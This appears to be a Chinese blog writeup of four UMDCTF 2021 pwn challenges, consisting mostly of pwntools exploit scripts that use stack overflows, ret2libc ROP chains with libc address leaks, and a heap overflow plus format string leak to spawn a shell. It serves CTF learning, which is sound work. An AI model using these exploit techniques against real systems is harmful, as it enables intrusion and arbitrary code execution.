6道pwn题,4道可以做。剩下一道题是arm架构,一道题是内核,溜了溜了。

Jump_Not_Easy

 1 from pwn import *

 2

 3 p = process('./pwn')

 4 elf = ELF('./pwn')

 5 context.log_level = 'debug'

 6

 7 def duan():

 8     gdb.attach(p)

 9     pause()

10

11 payload = 'a'*0x40+'bbbbbbbb'+p64(0x040125D)

12 p.sendlineafter('go?\n',payload)

13 p.recv()

Jump_Is_Easy

  system怎么也打不通,加了个ret才打通,估计又是栈对齐的问题(猜的)。

 1 from pwn import *

 2 from LibcSearcher import *

 3

 4 p = process('./pwn')

 5 elf = ELF('./pwn')

 6 context.log_level = 'debug'

 7

 8 def duan():

 9     gdb.attach(p)

10     pause()

11

12 pop_rdi = 0x004012c3

13 ret = 0x0040101a

14 fun_got = elf.got['__libc_start_main']

15 puts_plt = elf.plt['puts']

16 main = elf.symbols['main']

17

18 payload = 'a'*0x40+'bbbbbbbb'

19 payload+= p64(pop_rdi)+p64(fun_got)

20 payload+= p64(puts_plt)+p64(main)

21

22 p.sendlineafter('go?\n',payload)

23 fun_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))

24 libc = LibcSearcher("__libc_start_main", fun_addr)

25 libc_base = fun_addr-libc.dump("__libc_start_main")

26 system = libc_base+libc.dump("system")

27 binsh = libc_base+libc.dump("str_bin_sh")

28 print 'system-->'+hex(system)

29 print 'binsh-->'+hex(binsh)

30 print 'libc_base-->'+hex(libc_base)

31

32 payload = 'a'*0x40+'bbbbbbbb'+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)

33 p.sendlineafter('go?\n',payload)

34 p.interactive()

Jump_Not_Working

  感觉和上一题一样...

 1 from pwn import *

 2 from LibcSearcher import *

 3

 4 p = process('./pwn')

 5 p = remote('chals5.umdctf.io',7004)

 6 elf = ELF('./pwn')

 7 context.log_level = 'debug'

 8

 9 def duan():

10     gdb.attach(p)

11     pause()

12

13 pop_rdi = 0x004012c3

14 ret = 0x0040101a

15 fun_got = elf.got['__libc_start_main']

16 puts_plt = elf.plt['puts']

17 main = elf.symbols['main']

18

19 payload = 'a'*0x40+'bbbbbbbb'

20 payload+= p64(pop_rdi)+p64(fun_got)

21 payload+= p64(puts_plt)+p64(main)

22

23 p.sendlineafter('go?\n',payload)

24 fun_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))

25 libc = LibcSearcher("__libc_start_main", fun_addr)

26 libc_base = fun_addr-libc.dump("__libc_start_main")

27 system = libc_base+libc.dump("system")

28 binsh = libc_base+libc.dump("str_bin_sh")

29 print 'system-->'+hex(system)

30 print 'binsh-->'+hex(binsh)

31 print 'libc_base-->'+hex(libc_base)

32

33 payload = 'a'*0x40+'bbbbbbbb'+p64(pop_rdi)+p64(binsh)+p64(system)

34 p.sendlineafter('go?\n',payload)

35 p.interactive()

Jump_Is_Found

  堆溢出+格式化字符串漏洞,不知道为什么打不了got表。仔细分析代码就可以出。

 1 from pwn import *

 2 from LibcSearcher import *

 3

 4 p = process('./pwn')

 5 elf = ELF('./pwn')

 6 context(os='linux',arch='amd64',log_level='debug')

 7

 8 def duan():

 9     gdb.attach(p)

10     pause()

11

12 payload = 'a'*0x100+p64(0)+p64(0x111)+'%51$p'

13 p.sendlineafter('CONSOLE> ',payload)

14 p.recvuntil('location: ')

15 fun_got = int(p.recv(14),16)-231

16

17 libc = LibcSearcher("__libc_start_main",fun_got)

18 libc_base = fun_got-libc.dump("__libc_start_main")

19 system = libc_base+libc.dump("system")

20 binsh = libc_base+libc.dump("str_bin_sh")

21 print 'libc_base-->'+hex(libc_base)

22 print 'system-->'+hex(system)

23

24 payload = '1'.ljust(0x100,'a')+p64(0)+p64(0x111)+'/bin/sh\x00'.ljust(0x100,'a')+p64(0)+p64(0x21)+p64(system)*3

25 p.sendlineafter('CONSOLE> ',payload)

26 p.interactive()

总结

  第一次做国外的比赛,感觉还算友好。

UMDCTF 2021的更多相关文章

  1. codevs 2021 中庸之道

    2021 中庸之道  时间限制: 1 s  空间限制: 128000 KB  题目等级 : 钻石 Diamond       题目描述 Description 给定一个长度为N的序列,有Q次询问,每次 ...

  2. Bzoj 1982: [Spoj 2021]Moving Pebbles 博弈论

    1982: [Spoj 2021]Moving Pebbles Time Limit: 10 Sec  Memory Limit: 64 MBSubmit: 130  Solved: 88[Submi ...

  3. poj 2021 Relative Relatives(暴力)

    题目链接:http://poj.org/problem?id=2021 思路分析:由于数据较小,采用O(N^2)的暴力算法,算出所有后代的年龄,再排序输出. 代码分析: #include <io ...

  4. iPhone屏蔽IOS更新、iPhone系统更新的提示(免越狱,有效期更新至2021年)

    iPhone屏蔽IOS更新.iPhone系统更新的提示(免越狱,有效期更新至2021年) 1.在Safari浏览器中粘贴如下链接,按提示打开链接. 输入http://apt.dataage.pub 2 ...

  5. HDU 2021 发工资咯:)

    http://acm.hdu.edu.cn/showproblem.php?pid=2021 Problem Description 作为杭电的老师,最盼望的日子就是每月的8号了,因为这一天是发工资的 ...

  6. Math.abs(~2020) 按位取反后的绝对值是多少 2021, 按位取反后,比正数多1

    Math.abs(~2020)  按位取反后的绝对值是多少 2021, 按位取反后,比正数多1 int 值的取值 范围:   -128 ---  127   之间, 0000 0000     按位取 ...

  7. 部分PR回写的数量带有小数,分别是2023工厂的纸箱104007000389,2021工厂的纸盒404002005930;

    描述:部分PR回写的数量带有小数,分别是2023工厂的纸箱104007000389,2021工厂的纸盒404002005930: 原因:所有物料规划PR时对舍入值的先后考虑逻辑影响到回写出来的temp ...

  8. codves 2021中庸之道

    2021 中庸之道 http://codevs.cn/problem/2021/ 题目描述 Description 给定一个长度为N的序列,有Q次询问,每次询问区间[L,R]的中位数. 数据保证序列中 ...

  9. HDU 2021 发工资咯:)(最水贪心)

    传送门: http://acm.hdu.edu.cn/showproblem.php?pid=2021 发工资咯:) Time Limit: 2000/1000 MS (Java/Others)    ...

随机推荐

  1. [cf1178G]The Awesomest Vertex

    2020年论文题,这里给出了一个$o(n\log^{2}n+m\log^{3}n)$的做法,例题3即为原题 1.例题1 题面 给定$n$个一次函数$f_{i}(x)$,$m$次查询$F(x)=\max ...

  2. [ccBB]Billboards

    参考loj2265中关于杨表的相关知识 先来考虑$m\mid n$的情况: 记$t=\frac{n}{m}$,将序列划分为$[1,m],[m+1,2m],...,[(t-1)m+1,tm]$这$t$段 ...

  3. [atARC107F]Sum of Abs

    价值即等价于给每一个点系数$p_{i}=\pm 1$,使得$\forall (x,y)\in E,p_{x}=p_{y}$的最大的$\sum_{i=1}^{n}p_{i}b_{i}$ 如果没有删除(当 ...

  4. maven项目打包不带版本号的操作

  5. ☕【Java深层系列】「技术盲区」让我们一起完全吃透针对于时间和日期相关的API指南

    技术简介 java中的日期处理一直是个问题,没有很好的方式去处理,所以才有第三方框架的位置比如joda.文章主要对java日期处理的详解,用1.8可以不用joda. 时间概念 首先我们对一些基本的概念 ...

  6. 洛谷 P6624 - [省选联考 2020 A 卷] 作业题(矩阵树定理+简单数论)

    题面传送门 u1s1 这种题目还是相当套路的罢 首先看到 \(\gcd\) 可以套路地往数论方向想,我们记 \(f_i\) 为满足边权的 \(\gcd\) 为 \(i\) 的倍数的所有生成树的权值之和 ...

  7. Nginx+uwsgi+django+vue部署项目

    购买服务器 # 购买阿里云服务器 # 短期或是测试使用,创建 按量收费 服务器,可以随时删除,删除后不再计费,但要保证账户余额100元以上 连接服务器 1)账号 >: ssh root@39.9 ...

  8. R连接mysql数据库方法详解

    Warning messages: 1: In odbcDriverConnect("DSN=Rdata;UID=root") : [RODBC] ERROR: state IM0 ...

  9. KeepAlived双主模式高可用集群

    keepalived是vrrp协议的实现,原生设计目的是为了高可用ipvs服务,keepalived能够配置文件中的定义生成ipvs规则,并能够对各RS的健康状态进行检测:通过共用的虚拟IP地址对外提 ...

  10. 强化学习实战 | 自定义Gym环境之井字棋

    在文章 强化学习实战 | 自定义Gym环境 中 ,我们了解了一个简单的环境应该如何定义,并使用 print 简单地呈现了环境.在本文中,我们将学习自定义一个稍微复杂一点的环境--井字棋.回想一下井字棋 ...